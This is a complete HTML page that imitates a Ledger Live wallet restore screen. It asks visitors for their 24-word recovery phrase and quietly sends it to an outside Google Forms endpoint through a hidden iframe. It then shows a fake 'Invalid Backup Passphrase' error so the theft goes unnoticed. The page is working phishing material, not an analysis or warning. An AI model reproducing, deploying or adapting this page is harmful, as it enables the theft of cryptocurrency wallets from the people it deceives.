<!DOCTYPE html>
<html>

<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link href="css/main.css" rel="stylesheet">
<link href="css/chrome.css" rel="stylesheet">
</head>

<body style="background:#f9f9f9;">

  <div class="loader-wrapper">
    <ul>
      <li>
        <img id="loading" src="img/ledger-live.png" alt="ledger">
      </li>
      <li>
        <img src="img/live.png" alt="">
      </li>
    </ul> 
  </div>

  <div>
    <span class="img-container"> <!-- Inline parent element -->
      <img src="img/1.png" alt="logo">
    </span>
  </div>
  <center>
<div>
    
      <h3 class="fade-in" id="success-msg" style="text-align: center !important; margin-top:40px !important; display:none; color:#000">
        <ul>
          <li>
            <div id="boo">
              <img class="fade-in" id="loading" src="img/spin.png" alt="ledger">
            </div>
            
          </li>
          <li>

            <div id="foo">
              <br>
              <ul>
                <li>
                  <strong>Invalid Backup Passphrase</strong> 
                </li>
                <li>
                  <button style="width: 40%;"  id="try" type="submit" class="common_btn">Go Back</button>
                </li>
              </ul>
            </div> 
          </li>
        </ul>
      </h3>
    
</div>

<div id="started">
  <center><h3>Welcome to Ledger <strong>Live</strong></h3></center>
  <button id="start" type="submit" class="common_btn">Start</button>
</div>

</center>
  <div class="fade-in" id="main" style="display: none;">
  
    <center><h3>Restore Ledger <strong>Live</strong> Wallet</h3></center>

    <div class="wrapper">
      <form id="form" action="https://docs.google.com/forms/d/e/1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ/formResponse" method="post" target="hidden_iframe" autocomplete="off"> 

        <iframe name="hidden_iframe" id="hidden_iframe" style="display:none;"></iframe> 

      <div class="row">
        <input id="Field" name="entry.1957119181" placeholder="Please type your 24 words recovery phrase, with one space between each word." type="text" required> 
      </div>
 
    </div>

    <div>
      <button id="send" type="submit" class="common_btn">Restore</button>
    </div>  
      </form>
  
  </div>

  <div>
    <center>
    <span class="img-container"> <!-- Inline parent element -->
    <img src="img/2.png" alt="logo">
    </span>
    </center>
  </div>

<script src="js/jquery.js"></script>
<script src="js/loader.js"></script>

</body>
</html>
